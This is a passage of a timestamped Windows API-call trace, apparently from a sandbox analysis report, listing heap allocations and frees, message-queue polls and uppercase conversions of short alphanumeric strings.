out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.168] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0206.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.169] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.170] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.170] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.170] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.171] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.171] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.171] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.171] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.171] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.172] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.172] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0206.174] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.174] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.174] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.174] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.175] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.175] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.175] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.176] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.176] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.176] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.177] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 